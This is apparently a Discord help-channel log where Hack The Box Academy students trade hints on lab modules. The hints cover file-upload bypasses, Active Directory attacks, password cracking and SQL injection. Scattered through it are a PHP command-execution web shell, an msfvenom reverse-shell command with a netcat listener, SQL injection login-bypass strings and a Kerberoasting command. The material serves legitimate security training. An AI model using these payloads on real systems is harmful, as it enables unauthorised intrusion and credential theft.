#modules

hello all. is this the place to ask questions about this section of hackthebox? https://academy.hackthebox.com/module/18/section/70

Yup, but I doubt just adding the domain name bumps directly to DC01 here. Not sure hmmm

Give module and section name, not just a link

Also just ask your question

okay, ty, ill put it all together, few mins lol

@fathom pendant Usually how you get on machines (so far from what I've read from the module) is you supply the machine name to other tool like Invoke-WMIExec, where you mention the machine you want to execute command on.

True

I'm just kinda half paying attention

I'm getting refresher on this topic helping Moo32 here lol

It helps reinforce knowledge

It's why I lurk here

Same lmao

So, got this right now. started it very late last night, and went to sleep unsatisfied of not solving it. So many special cases in bash. like: " $var" if var is String but $var if var is number.

Then there was the issue imo that when talking about the "last 20 chars of a value in base64" it should technically be echo -n $value (to avoid the newline added ), but examples use straight echo or echo -e.

Question: Double brackets [[ "$var" == "$val" ]] need to be added exactly when?

To get a boolean value out of the test? Do I NOT get a boolean value out of the test function / [ ] brackets when its like: [ "$1" == "myfile.txt" ] ?

Or do i need the double Brackets [[ ... ]] only when using boolean operations, like in: [[ "$var1" == "KFC" ]] && [[ $cash -lt 10 ]]

Thanks for your support

For understanding purposes, try playing around with impacket-smbserver.
But for short to clear your doubt on how SMB is confusing you is
I could host a share named julio on DC01 which serves from the location C:\Temp\David
which means, everything you see when you list \\DC01\julio is all files under C:\Temp\David not C:\julio

Im on module Active Directory Enumeration & Attacks section Credentialed Enumeration - from Windows. Im using the credentials given but i cannot connect to rdp

@rustic sage Follow this https://academy.hackthebox.com/module/147/section/1638#:~:text=either would work).-,Invoke%2DTheHash%20with%20WMI,-Invoke%2DTheHash%20with

I seem to be having nothing but issues with the Client-Side Validation section in File Upload Attacks. None of my attempts to upload a payload appear to work. I think the instructions are lacking something. Do we have to change the name of the file before uploading it, or when we change the file name in Burp does that tell the web page to automatically pull that file name?

are you getting any error?

nope it says the credentials are incorrect

can you paste or ss the commands you're using?

unverified users can't share screenshots

Ah, he's unverified.

xfreerdp /v:10.129.233.60 /u:htb-student /p:Academy_student_AD!

Seems proper to me, maybe try wrapping the passwords in single or double quotes to see if that helps? But, the command you presented should have worked fine.

Single quotes around the password should do

Thanks

Note you should edit that .locl to be .local

So was that a typo with hack the box? Because thats how they worded it.

done

? The question says .local

Did you changed the module just now

The vhosts they give you, are also .local

Payload isnt staff lol

Oh okay. interesting cause that is what I copied

He simply copied the typoed command you shared

I cannot customize any modules
I have only corrected my message here in Discord

¯_(ツ)_/¯

Payload is just really active in helping community

Maybe it was from something else. NM

I'm still stuck in the Client-Side Validation section in File Upload Attacks. I've tried using Burp to modify the file name so that I can upload a php file and tried using the web developer tools to remove the file restrictions. Neither works.

If you find a bug/typo, just report it in the channel #858470491676737536

Perhaps Content-Type?

It says in the section that it shouldn't be necessary to alter this yet. I'll give it a shot.

I haven't done that module just throwing an idea

I'd suggest going over all the strategies in the module

Still getting the 'permission denied' error

Just do sudo {insert text editor here} /etc/hosts

so leave out 'echo '10.129.172.169 app.inlanefreight.local' >>?

Yes

so the text editor I will use is nano. so 'sudo nano /etc/hosts'?

Yes

Nope, that didn't work either. I just get a blank web page that says "File failed to upload" when I navigate to where the file was uploaded.

Are you sure you are handling Burp correctly? There are some great extentions for Chrome to stop HTTP requests in order to change the file name. That's how I am doing it

I'm just following the instructions in the section. I upload a regular image and send the GET to the repeater. I modify the file name and add this script <?php system($_REQUEST['cmd']); ?> as it shows. I then forward the request and get a successfully uploaded the file response. However, when I go back to the page, it just says "File failed to upload".

I'm also using the msfvenom script from the previous section to create my payload.

I also tried modifying the page using the web developer tools as the section shows. This doesn't work either. It either breaks the page or just doesn't do anything at all.

For the record, because I did not do the module yet. You've got a file which containts <?php system($_REQUEST['cmd']); - right? Save the file as Image.php.png and try to upload it. There shouldn't be any restrictions, because, it is a .png file. Intercept the request with Burp and change the file name to Image.php (remove the .png). After that you can forward the request

Ah, I see what you mean. I'm trying to use an msfvenom payload and no wonder it's not working. I need to use the <?php system($_REQUEST['cmd']); script! Thank you! I had a feeling it was something simple I was overlooking.

It's always the easy things 🙂 Glad to help

Nope, still the same thing. "File failed to upload".

And my listener doesn't grab anything.

I'm going to restart the instance. I think that's probably going to fix it.

Well, I just started the module and did exactly what I wrote before. And Burp's response is: File uploaded successfully

Yep, I get that too. However, when I go to the web page to interact with the uploaded file. I get the error that the file failed to upload.

Wait, what?

You need to go to /profile_images/shell.php?cmd=id

To activate the shell

Because if you forwarded the request, your shell should be already uploaded to the server

Okay, I see that now. Thank you! I was in the wrong directory.

Hit me up If you're stuck again

I just submit the flag.

Nope, that's all it was. I got the flag. I'm going to keep trying the other method, though. Thanks again for your help!

👍

any hints in file uploads skill assessment ?

File upload is on the contact form

yess I found it , but idk where my files are stored

You could start dirbuster

I tried fuff but nothing

I am gonna look for something else

The only suggestion I can give rn is Path Traversal Attack

whaaat hhhh

anyway ty bro , I need to try harder

@limber river Someone wrote following on the forum a while ago: 1). You must identify which PHP files are in the web application. You can use ffuf to find them. 2). When you find the PHP files, try to read them. One of them tells you the path. The “Limited File Uploads - XXE” section of the module tells you how to read PHP files.

step 1 done

2 ) trying to figure out the step 2

Do I get extra cubes if I find a misspelling in a module?

I’d report it to the CS team if you found a misspelling

Hi, can someone give me a hand on the AD enumeration and attacks, privileged access section? I am asked to find what other user in the domain has CanPSRemote rights to a host, but using the provided command and bloodhound, I can only see that the user forend has CanPSRemote rights. I can't find another user. Can I have a hint, please?

You get a nice pat on the back

Dude im a beginner too lol I had 0 clue on how PtH/PtT worked

I'm on the Black List Filters section of File Upload Attacks. I found several working file extensions. However, every single one of them just prints the contents of the file to the page. It doesn't execute anything I send. I've noticed a couple of people on the forum mention this, but I don't see a solution for it. Has anyone been able to get around this?

brooooooo you already surpass me !!!!

I'm sure you'll catch up to me soon enough. I'm struggling a bit with this module.

That tends to happen lol you leapfrog ahead of someone then crawl to a walking pace

I found a useful trick , use intruder against the path where you suppose to get your result with the same wordlist and the look for a different response

it works for me

Okay, thank you. I'll give that a shot.

any help file upload skill assesment

the uploaded file must ends with any php extension (i.e. php6, phtml, etc...)

so image extension then php extention

eeem ty

Hey quick question on the Kerberos attacks module, for Unconstrained Delegation - Users using krbrelayx's addspn.py; the syntax in the mod specifies addspn.py -u inlanefreight.local\\pixis -p p4ssw0rd --target-type samname -t sqldev -s CIFS/roguecomputer.inlanefreight.local dc01.inlanefreight.local but when I try using the --target-type samname the script errors out. Checking the man page there is no such flag. Anyone find a workaround for this?

Someone mind helping me with Password Attacks Lab - Medium?

Where exactly are you stuck?

Logged in as J, found D but no password. I know what service I need to use to find it but can't log in to that service using J or root

You should be able to . Maybe j* has history on how they logged in

Can't find it...

have been looking for 2 days now

Can't you just use the command with no arguments to connect?

Iirc

My notes only say documentation was important

Take a look at the services running on the system

There is something that J can access. There you should find what you are looking for

Hello hint for password mutation in password attack module. What I can do to reduce my time

#modules message

Guys Could you tell me How to get flag from Machine : PC Plz. T_T

Which Lab is this?

This lab Bro. : https://app.hackthebox.com/machines/PC

Ah, okay. Then this is the wrong channel
Ask here: #1109540152663085056

OK guys

I can't enter to this room. how to get permission.

If you don't have access, read #welcome

Okay

Still it is 17000 wordlist it takes time.

there are hints in this channel

that will help you reduce the time

Where

Search for them, I don't know exactly the date or the time of the hints

CTRL+F search for what do you need

I have sent you the link.
#modules message

am i the only one

like im trying to answer a question, i see its wrong.
i look for the answer for like idk 1-2 hours i go back to my first answer and somehow its right?

Hello all, on the attacking joomla section in the attacking common applications module. Found the flag, but can’t do anything with it with the script given…can’t print it out or anything. Any guidance?

There could be many reason, but the most notorious one would be an trailing space or space before the answer.

When you're sure about an answer, make sure to pay attention to what you're selecting for paste or typing.

move parameters. I don’t get it !????

But the link points to another post

In order to open a KeePass database file in a windows command line I'm using the following command: .\KeePass.exe C:\PATH\adatabase.kdbx -pw:'crackedpassword' . The terminal is not displaying anything however. Am I missing something?

How to know default creds of mysql. Password reuse/default password

@limber river Did you find the path to the uploaded files?

if I'm not mistaken, you can't use KeePass in the terminal.

The module explains how to find such passwords

Anyone have a hint on Introduction to Deserialisation Attacks: Object Injection (PHP)? I'm injecting the XSS in, but I'm not getting the file output. Either the XSS method isn't giving output, or I'm pointing at the wrong file location.

Yo all for RDP and SOCKS Tunneling with SocksOverRDP am I supposed to be locked down by windef and privesc to disable it or am I misisng something?

These academy boxes are buggy af so not sure if I am supposed to restart it haha.

oh nvm the account is already administrator

I had the same feeling- after wasting several hours. It was mostly questions where there wasn’t a real flag, but something like “Enter the number of chars in var_x” or similar. Very frustrating. Especially when you theoretically know how to get the answer in 1-2 mins, you implement it, it’s wrong, and you spend hours digging rabbit holes to circle back eventually and somehow it works

can anyone suggest a good module for someone starting out as a infosec analyst

yes am here

SQL Injection Fundamentals

you're command is wrong

it's not -h docker.hackthebox.com

thaats what the site says

it's -h IP -P PORT

these are examples

yh

even if i do it with the real ip it gave me it gives me the same error

so the correct command would be mysql -h IP -P PORT -pPassword

or mysql -h IP -P PORT -p

aha

my bad

oho

Cheers Mickhat, have fun D4rka4k 🙂

5.99

😂

Put it on the tab

If you need help DM me or open a ticket on the platform ( a colleague is working) @quartz saddle

ive dmed you :)

welcome to the club hahahha

originaly i started doing HTB for the sake of learning abit SyS admin stuff
as i believe, if you know how to break stuff for sure you know how to protect and fix it 😂

Exactly right @spark iris !

yeaah bro , I found the flag thank you

Can anyone help with attacking common applications skills assessment 2
What is the admin password to access this application?
I tried the default credentials and also a brute-force attack for the default admin user nxxxxxadmin, but no luck yet

Why access denied ???? When I want to get the sam with reg.exe

Are you running it as admin? Are you saving it to a writeable location?

Thank u.

imcurrently around in the middle of linux fundamanetals and i gotta ask, there is alot of questions which make me realy to actualy google stuff to find the answers

is it me just that im stupid or is it indented?

Not everything is included in the modules (but so far the modules have mostly enough to answer the section questions) and this practice of googling to find answers is a key skill. (Unless you're referring to googling literally the answers to the module questions)

most of the time i just find hints but there has been 1-2 times where i just found the command to the answer and broke it down

for example

||ss -l -4 | grep -v “127.0.0” | grep “LISTEN” | wc -l||

i would never come up with this command in my mind myself.

That's okay, try your best not to look around forums where people talk about the actual module, browse around blogs related to the topic and craft your commands/answers from there.
It'll take time to build yourself upon stuff, like the one you just shared. Everyone's been where you are right now. So don't worry.

just wanted to see how other people went through it or if the modules explain everything realy good (even though i still feel the elaboration of commands lacks abit) or i just struggle in unterstanding

it results into a fustration of your own self

Ah, frustration is inevitable. Trust me everyone who signed up for this go through that every other day.
Take breaks. You got this.

Attacking Common Applications - Skills Assessment II

What is the URL of the WordPress instance? --> unable to find it, cannot FUZZ vhosts, since the web site drops instantly(kinda DoS)

What is the admin password to access this application? --> cannot find password, no success for a long time, found nothing useful in gitlab, although I could not find appropriate exploit for that version of gitlab.

Thanks.

intended

Okey Okey, gotta download it locally then.

DM me I managed to solve the vhost part, but been stuck on the password for some time

Look here

https://hashcat.net/wiki/doku.php?id=example_hashes

i always check there

but there are a lot of SHA256

Hi guys

How are you?

#general

I will asking about academy modules

ok

When I start "File Upload Attacks Module", I used msfvenom to create the payload
msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=4444 -f raw > reverse.php

IP from ifconfig, and the port we will listen by

when I upload the payload and click Download file I didn't get anything/shell by nc -lvnp 4444

The result ^

fuck metasploit lol

it should work

unless u used wrong port or ip

Heyo, redoing a question I've done earlier in the "Starting out" module.

SSH into the server above with the provided credentials, and use the '-p xxxxxx' to specify the port shown above. Once you login, try to find a way to move to 'user2', to get the flag in '/home/user2/flag.txt'.

Can't figure out a way to gain access :/ Have tried gtfobins without any luck. Pointers?

No, I used my tun0 ip, and any port to listen

When it's didn't work, I used "<?php echo system($_REQUEST['cmd']) ?>"
and ?cmd=cat /flag.txt

I tried to do the reverse shell but it's don't work yet

so ?cmd=cat /flag.txt worked?

yes, I get the flag

Does the module you're doing asks you to get a reverse shell? or it's out of your own interest?

Looking at the target address, there's possibility that the outbound request to connect to our listener might not be possible? I might be wrong

you can run commands to check by printing the NIC and routes to confirm?

Nevermind. Solved it. I was overthinking it. No need to do any custom XSS commands. Just ||examine the source code for dashboard||.

guys how do i start?

i just want to lean some basic code

Code what?

anything ]

i dont know anything

just some basics i guess

Hi guys, how i know the index number of a directory ?

code?

this is not a coding server

https://www.hackthebox.com/blog/learn-to-hack-beginners-bible @rustic sage

https://www.codecademy.com

Can I get some help on the File Upload Attacks module in the Blacklist Filters section? I have tried all of the extensions that give 193 length response and oddly enough, some of them still won't work. All of the others that do work just give a single black box on the page instead of executing the command to print Hello HTB on the page. Has anyone else run into this?

Why not add the reference to revshells.com in the module Shells & Payloads?

Why u cant use the pwnbox anymore????

Just for 100 min

Are you referring to the academy one or the main site

The academy one

Bcz i want to answere some questions

But now i cant

Academy you get one daily spawn unless you purchase cubes :p you can always restart it if you've already paid for a sub or cubes

Once you buy sub or cubes it's infinite

Where can i purchase with cubes?

You don't purchase pwnbox with cubes

You just need to purchase cubes

Aaaaaa i purchase cubes okey

Just once

And i get infinite

?

Ye

I don't have a sub and have infinite spawns

Thats cool

https://academy.hackthebox.com/faq

Or i cn use a vm and connect aswell?

Yep

VM is infinite connection time

Yep but i need a pc first xd i hve a bad pc

So...

Pwnbox is there for users who can't run a VM on their own system

True, i think i will buy some cubes

The cheapest is like $5 USD?

Module: Password Attacks | Section: Protected Archives | Q: Use the cracked password of the user Kira, log in to the host, and read the Notes.zip file containing the flag. Then, submit the flag as the answer.

what wordlist should i use?

am using rockyou.txt and i cant crack the archive

At this point you should already have cracked kira's password iirc. However there is a resources button: and a section telling you how to mutate

i mean the wordlist to crack the zip file

Password attacks reuses the same boxes/creds

Same wordlist iirc

Try with the base then move over to the mutated

ty

Is there anyone able to assist with the Blacklist Filters section in File Upload Attacks? I have the list of working extensions, but for some reason even these get rejected when attempting to use them. I've run out of all available extensions with the provided lists and I either get the command printed on the page when I navigate to the file or just a small white box in the center of the page.

Try this List to find a extension
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload Insecure Files/Extension PHP/extensions.lst

In Introduction to Deserialisation module, Tools of the Trade, the question:
Using PHPGGC, obtain RCE on the target and submit the user-id of dnsmasq
I've checked the running processes, but I can't see dnsmasq running. Any ideas what I'm missing?

Yep, I've used it and gone through all of the working extensions that give a response length of 193. They all either print the command on the page or give a white box in the center of the page.

I did the module a long time ago, but with one of the extensions you should be able to inject PHP code.

Yeah, I would think so. I've been through every one of them and I get the same results. Also, oddly enough, even though many give a 193 response length, the site still won't take them.

Anybody here using the modules to Help prep for eJPT and eCPPT ?

||One will||.

I've been through all of them several times now. They either print the code on the page or give a white square in the center of the page.

Did you open each of the uploaded files with the browser afterwards? One of them should show your text "Hello World

They show Hello World, but also the entire script. Just like this <?php echo "Hello World";?> printed right on the blank page.

Am I supposed to modify the extensions in any way? I haven't tried adding any extra characters to them yet.

It just ||needs to match the extension that passed when you fuzzed it.||

Right, I realize that. However, even some of those won't upload. The site won't take them.

... yes that's the point of the challenge.

You are trying to find which file extension bypasses the blacklist, but can still execute php code.

Then what was the point of even fuzzing?

Because you ||fuzz it with the list of extensions to find out which ones upload successfully.||

Ah, got it. So even though the site won't take them, they might still have execute capabilities so we need to find a way to still get them through.

I think you're overthinking it. Literally its just bypassing a weak upload check blocking .php file extension. You need to upload the file with an extension that gets around the blacklist, and would still be executed by the php server.

I've tried all the ones that give a length response of 193. I need to go back and see if I can find a way to get any of the others through somehow.

All that have returned 193 as length have been uploaded.
So now you have to call the individual files in the browser and check if they execute your PHP code

If it gets uploaded, but doesn't execute successfully to give you a shell, there's probably something wrong with your shell code.

Try this PHP Code

<?php echo "Hello world!"; ?>

The page will then display Hello World. If not, the code was not executed

I'll try that code. Thank you.

Not sure why this particular extension didn't work before, but I got it! Thank you both!

Nevermind on this. Realised I'm just over tired and overthinking things.

Sometimes things just don't work first time. As PayloadBunny knows from me messaging them yesterday (- -)

(╯°□°)╯︵ ┻━┻

I was having an issue with crt.sh last night and got parsing error... Reran the command and it worked

Just?????????

Possibly imported something correctly, or set an environmental variable?

I legit changed NOTHING

yeah but the command might have changed something (i've no recollection on what crt.sh is)

crt.sh is a website that grabs public certs for sites

So you curl it

someone i can ask to ask for sanity check in password attacks easy lab

sure

Module 21 Section 129 exercise is wrong. Question asks for 20 chars but 19 chars is the accepted answer.

2 things:

1. give the actual module and section name.
2. post the issue in #858470491676737536

This can happen.
I was in the same situation as you and I needed the author's advice. It just didn't work. I don't know why, but suddenly it did.

#858470491676737536

They did lol

which is module 21? 😮

Bash scripting

Sorry for the confusion, posted in erratum with the details.

is intended the public key error in the easy lab?

in password attacks module

Pub key error? You mean attempting to ssh in and getting ... (Publickey)?

yea

That just means you need an rsa to ssh in

Instead of password

Default is like "public key, password,"

where i had to save the rsa?

But yeah it's not necessarily an error so much as "you need to get something else first"

Check the combo you have against available services

||How do I crack the Notes.zip Files in Kira's Folder||

Question:

Examine the target and find out the password of the user Will. Then, submit the password as the answer. | Under Credential Hunting in Linux

||I have found Kira's Password i can see .bak files under Will's account but unable to crack .zip file Please help||

So here's the thing: the module uses the same box, so you will get things you need later

i did it

but not sure how to use the cracked key

Use the rsa key to sign in and watch the magic

@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
mike@skills-easy: Permission denied (publickey).```

forgot the permissions i think

Yep

yea now it worked

i should have readen the bad permissions before lol

The notes.zip is for the protected archives section

on https://academy.hackthebox.com/module/33/section/799

i have the ip and port but it wont let me use mysql

can i have any hints or smthing been stuck for a hour

If you have the .bak, you have the creds

Module name?

SQL Injection Fundamentals

on the using coments section

u just need the .bak files

.zip is for the protected archives section

did you find anyhting

I haven't done that module

There are two .bak files stored in Will's account Pass and Shadow

have u readen the section?

on https://academy.hackthebox.com/module/33/section/799

Tried everything I know but I can't finish it can anyone send me hints

Can you try posting the actual screenshot of the problem you're facing? So that people that haven't done the module can also try helping.

Just make sure to mask out sensitive informations.

The section tells you what to do with those files, you may need to transfer them back to your system however

Iirc the un* command isn't on the victim machine

Can you provide any hint? Cause I tried to solve it at night. Couldn't find anything yet

Just turn off my pc but

I have ip and port it's a login page you have to sql inject and you have to use Id 5

Do not use msfvenom or metasploit for this task

Ah shimmers, I just realized I did complete that module. Totally forgot
Let me take a look at what I did

Thanks

Don't ruin it but have I have a little shove

Nah, won't ruin it. dw

Just a tip with SQL injections, when you're using -- to comment everything after, make sure there is a space after -- like to be safe I do --+

That's what I did

I log in but it's not with the 5 id

Like erm

admin' - - '

Kinda really scuffed on phone

dw, i get it.

so you're getting logged in as admin, correct?

Yes

I've done

Tom

John

And asmintrstoe

well, you're trying to login to a user whose id is 5

meaning that the only condition that should be true is id is 5

Dk how to do that atall

Tired everything I've been told pretty mich

you just make sure everything else is false

Still

oh wait, is this actual payload you tried?

Around that I can't remember rn

take a look at the module examples once again, get a clear understanding of what the operators do

and try again.

Yeah ill js skip it pissed me off to much cbs

if anybody's pursuing CPTS and looking for an accountability partner I'm down. Im currently on Password Attacks!

Spray it on the network

You have a valid username:password combo which was cracked from the TGT which was directly provided to you from the KDC

Has anyone osint module course from htb?

Corporate osint

you can use cme to spray the credentials to see which machines these creds pwn or have local access to

You also just now have access as the peter user

what he can reach you can reach.

and hey he may have unintended higher privs n such that can be discovered with bloodhound

or maybe hes just a dead end, not all users are useful.

What do you want to know?

yea

u told it

u can move laterally

check if he has access to something interesting to do the privesc

Examine the target and find out the password of the user Will. Then, submit the password as the answer.

i am stuck on this question i have kira's password

i copied the passwd file and note to my pc

u told u had access to .bak files

I have a question for the Whitelist Filters section of File Upload Attacks. Do we need to use more than one wordlist to complete this section and get the flag, or is the PHP wordlist modified with the bash script the only one we need?

Hi guys

How are you?

I have an extension that gives a Forbidden You don't have permission to access this resource. The others just give a Not Found error.

in the "File Upload Attacks Module" I upload the .php2 file and it uploaded successfully but didn't execute, So when going to it, it show me the code

https://academy.hackthebox.com/module/136/section/1288

I just finished that one. Keep modifying to extension using the ones that gave a response of 193. You'll land on one that works.

in password attacks hard lab

when i upload the file to windows where is it stored?

How did you upload it?

ok ive had help from someone on this broken authentication module section Predictable Reset Token but i keep getting traceback errors with the script. does anyone here have a solution that can help?

been stuck on this for 2 weeks now

have u done the password attacks module?

Yes, I completed that module.

Sorry, I'm not familiar with that module.

its ok. im just looking for someone that has and gotten through this section. i had one of the staff helping me but i can say they arent all that helpful

like its a simple script and no matter what i do i get the same exact error

I would ask for staff help again but for some reason the page will not pop up the request help discord button

as you said you have to find php files one of them contain the directory where your file will be stored and a function rename the file , then make sure that the extension of your file is allowed and executable by the webapp ( I used the bash script provided on module with the extension I found with intruder ), ofc you should use a valid content type

https://academy.hackthebox.com/achievement/664482/147

the longest module i have done for now damn

and tedious

closer to complete 50% of the academy 😄

I want to learn corporate osint table of contents

I want to learn corporate osint table of contents

Well they are all listed there: https://academy.hackthebox.com/module/details/28

Doing the Documentation and Reporting module right now, I've typed the key combo for a vertical split in however many ways I could guess the question is asking for but it's still not taking my answer

It is in the section

ah, skipped over that

Is it possible to complete both CPTS and CBBH learning paths in 5 months?

Or 6?

Forgetting about the exams?

Let’s say I practice on both academy AND main platform

The time estimates on each module typically assume that you're a complete novice, and off the top of my head, CPTS and CBBH are both about a month each?

Maybe less, I'd need to check

The better question is how long it'll take to absorb that content and make good use of it, which is entirely dependent on how much you already know and how well you learn from the material

There is also overlap between the two

oh yeah that too

about a third of it overlaps iirc

Kindly share an ss

Just fucking go to the link lol

Or look up Corporate OSINT on academy

Hello. I’m working through the Host Discovery page of the Nmap module. There’s a question at the end of the page asking me to find out which OS is running on a target network.

Am I supposed to solve the question with the info on the page, or perform an nmap scan on a spawned workstation?

No, you don't have to spawn anything for this one. Look at the last result on the page and give the OS that the host is running.

are the servers down?

nvm it worked now:D

Thanks for your reply. 😄

I’m reviewing the last result and it’s an ICMP echo request. There’s no additional data aside from the MAC address.

Aha. I’ve got it.

Glad I could help.

same here.

It's up but then it throws 500

alerted our team

Thank you

it is up now, just logged in

Are you able to spawn targets?

i am

Ah, I've been trying to spin up the target on AD Enumeration & Attacks - Skills Assessment Part I for the past 20 minutes.

It spawned now

Thanks guys!

glad to hear to hear your in 🙂

Anyone knows why im getting host unreachable with both vpn starting point or pwnbox?

I looked up and seems to be a common issue, but i didn't find a solutoon yet. Anyone can help?
Already checked the vpn and was connected correctly.

Well considering this channel is regarding modules found at https://academy.hackthebox.com I would say you're in the wrong place

Sorry about that, was the only section i could write into

Read #rules and #welcome

I'm aware :) this happens a lot

I should make a post in community help?

Or in the #starting-point channel after following instructions found conveniently in #welcome

should there be any credentials for the IMAP/POP3 section of footprinting module?

Yes

Read carefully

is setting up a VPS is important?

Not really for Academy

oh alright, because i dont have money to buy the server, thank you

because I'm still student

thanks) found it

Need help with Attacking Common Services Medium Lab. Found a username, but bruteforcing make no results. Can anyone give a hint?

there is a non-default port that you need to focus once you have a username

triage

@autumn pilot And it can be said a little clear.

.

guys, anyone who can help with
section: Attacking Thick Client Applications
module: Attacking Common Applications

guys

idk know what to do even

Hi guys, I am working on Web Attacks module (currently XXE Advanced Exfiltration with CDATA) and I am stuck on one of the examples. I tried to recreate it, however the payload does not work and I am not sure I understand why. Can anyone help please?

dm me

sorry guys, i have a problem. I am on Intro to Network Traffic Analysis module and i have found this question: "Given the capture file at /tmp/capture.pcap, what tcpdump command will enable you to read from the capture and show the output contents in Hex and ASCII? (Please use best practices when using switches) " in tcpdump's submodule. I have probed all combinations that i think are correct but nothing of that are correct. I need help

and the same thing happened to me in this question: What addressing mechanism is used at the Link Layer of the TCP/IP model?

i probed with MAC but it isnt correct

anyone?

You tried sudo tcpdump -r /tmp/capture.pcap X?

Module: SQLMap Essentials
Section Name: Bypassing Web Application Protections - case #10
Hello everyone, I have a question for the case #10: I managed to get the flag both manually and through sqlmap but I did "nothing special".
I did not have to add special switches to sqlmap or modify my HTTP requests so I was wondering what was the "Primitive Protection" to be bypassed.
Thanks!

Did you manage to solve this? I'm up to that same point.

Does anyone else have any pointers on ||how to generate the CSRF token appended to the end of the cookie|| in Introduction to Deserialization Attacks Skill Assessment II?

try to look at|| https://www.php.net/manual/en/function.hash-hmac.php||. i tried to reproduce this logic by myself and had an error

If anyone gets stuck on the osTicket section of the Attacking Common Applications Module, here is a brief explanation.
support.inlanefreight.local will take you to a login page, but it isn't the correct login page. You need to visit this page instead:
support.inlanefreight.local/scp/login.php

If anyone is wondering why there are two login pages. The reason is that the one page is for customers of the ticketing system to login and interact with their tickets. The other login page is for Inlane Freight staff who manage and reply to the tickets.

They should have explained that there are 2 login pages in this section, or just setup a redirect on the landing page. There are 22 people asking the same question in here, it's ridiculous.

Maybe you missed this picture in the module.
https://academy.hackthebox.com/module/113/section/1214

I eventually noticed it and that's how I caught on

Will do. The ||key is the one commented in the code?|| also loved the bmdyy link 🙂

Any one knows how to make IDS

Ideally they should teach us that there are 2 login pages. Actually, they should have integrated that fact into the challenge. Enable guest user sign in here (support.inlanefreight.local), and force us to look at the tickets to find the name of one of the user agents. Then show us how to brute force the agent's password on this login page (support.inlanefreight.local/scp/login.php) using a simple list of 100 passwords.

We've just taught everyone that it's possible to login to "Customer" and "Agent" accounts, which is piece of critical information, and how to brute force those accounts, while at the same time avoiding 22 people asking the same question in chat.

Post this in the #858470491676737536

Koi mera dost banega biru.. Loog me good admi hu.. I want personal hacking sangathan so i discuss alag alag project #all

What

English only & this is not a place for such request.

can someone help me with that question in command injection Bypassing Other Blacklisted Characters

or give me a hint

i tried a lot of paylods

https://academy.hackthebox.com/module/112/section/1245
"What is the account's cleartext password?"

I have found the hash and the username but can't quite figure out how to "unhash" the hash 🙂 could anyone give me a hint?

so you need to try 🙂 the answer is in using this function. || try to reproduce the legitimate object with this function and play with serializing of this object. ||

crack it with john

On the Password Attacks module where we are supposed to use crackmapexec to get winrm user....how are we supposed to download the "Resources" file onto the Parrot OS VM?

currently working on Introduction to Bash Scripting: Flow Control - Loops, can someone explain why the decryption doesn't work?
||

for i in {1..28}
do
        var=$(echo $var | base64)
        salt=${#var}
done
```||

What section are you doing?

echo $salt add this in last line

@red current Network Services, question 1

wget? 🤔

I'm running into an issue with the first question on the Limited File Uploads section in File Upload Attacks. I tried using Ffuf to get a list of directories or pages and I only get the same directory starting with the letter i. Does anyone have any hints for this one?

@raven quail Unable to download the "resources" from the "Password Attacks - Network Services" module...apparently it is the only way to solve the winrm user question, etc

dm

below ||done||, or could you give an example

okay, i did that. still got bad decrypt

show me ss in dm

someone can give me a nudge for the module: attacking common services - section: attacking sql databases

What is the password for the "mssqlsvc" user?

The section tells you how to crack ipmi

Try to get the hash

i got it

i just needed to read a bit more about how ||responder|| works

was doing it wrong

any nudge on footprinting lab medium . got access to the database not able to get the htb user password

I've tried using several different payloads for the Limited File Uploads in File Upload Attacks, and nothing seems to work to get the flag for the first question. Ffuf should be able to locate pages or directories and that isn't working either. It's almost like there isn't anything to find here. It's really strange.

Look at the databases and then read out the corresponding database

users ?

Take a good look at the features of the website and then play around with them

Also query is a useful option

Note sure what you mean, but I'll see what I can find.

hello i wanted to ask where can i just talk to ppl ?

Your screenshot currently shows the DBs master, model and msdb

#general

oh it says i have no acces

Look around for a file that has access credentials to sign in with potentially. Or maybe another user has better permissions that you find creds for

srry but i didnt understand wut u mean

Sorry thought I replied to someone

Mobile is dumb

Read #rules and #welcome

oh ok ty

Yeah, this site doesn't really have any features. It's pretty basic.

You can upload pictures, right?

Yes, but any time I try to add the script to them like it shows in the section, I either get an error that there is no content or I get nothing at all but blank page with Update your logo written on it. And the source code just has the usual page info.

Has anyone faced an issue where, you kerberoast and redirect the outputs to a file in the machine.
Then when I try move the file to my machine, The format is just very bad. (sharing screenshots)
This is a screenshot from the antak webshell. I cat it and it seems fine but

Here's how it is after downloading

Sometimes you may need to upgrade a webshell to a full shell

I get the same results even from normal shell.

Have you tried just copy/paste?

Maybe PHP is just the wrong language

Not sure what you mean. I've tried using the XML scripts and I also don't get anything.

It's this space, that's the problem. I guess I have to change the format when I output it.

Okay, XML is fine.
Which graphic format does XML use?

I remember having this issue, I think you could add -nowrap to your command. Might be —nowrap

SVG.

Ah true, I extracted the TGS using PowerView, should have just stuck with Rubeus.

what module is that

Active Directory Skills Assessment 1

I guess my issue is that there doesn't appear to be a way to know what directory the flag is in. I've tried using ffuf, the provided scripts, and just trying to get things we've used in previous sections to work and I can't find the right directory. Ffuf should have been able to provide it.

After I got home, first try, got it. Woo! Just final question to go now! Thanks for the assist!

Yeah, the command I used is more preferred to be saved to a CSV file.

then use cat command to read it ?

We could, but I was thinking in cases where we just want to get all the TGS in a file and crack it one go to save time.
Like Simple one file transfer and supplying the file direct for cracking.

cat the .csv file?

ye!

hey guys im on Password attack module, on Credential Hunting in Linux i was able to login on the system but i can not find will credential any hint?

the problem is about the space right?

Perhaps a __ba__c__k__up is useful

Yeah, but wouldn't cat'ing the csv file just make it worse? I haven't tried it so I'm not sure.

Read everything the section tells you

do u like lasagna?

i saw that but only i can read one file there

nah XD

let me try again with lazagne so

Let me check what you said rq

Any clues on how to find the right directory for the Limited File Uploads in File Upload Attacks?

I got offtrack, but yeah, for readability. we can do it like that I guess.

Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Out-File -File TGS.txt my mistake was this command, hoping that I would get the hashes down quickly to start cracking, instead of transferring rubeus to the machine.

But, yeah. Thanks for pointing that out. @wide river

yw, feel free to dm me if you need hint for AD Skill Assessment

i have already probed but it isnt work 😦

which modules do you recommend to start? an order to follow since im a beginner in this

Infosec fundamentals path

@zinc marshive got some error with lazagne

which one is that?

Left-hand side there's a paths button

:)

